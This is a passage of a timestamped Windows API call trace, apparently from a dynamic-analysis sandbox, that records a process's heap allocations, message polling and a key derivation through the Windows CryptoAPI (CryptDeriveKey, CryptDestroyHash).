(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0230.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0230.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0230.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0230.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51340 [0230.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51340, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0230.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.378] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.379] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0230.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0230.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0230.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0230.383] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0230.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.384] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b28 [0230.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0230.384] CryptDestroyHash (hHash=0xa872d0) returned 1 [0230.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0230.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 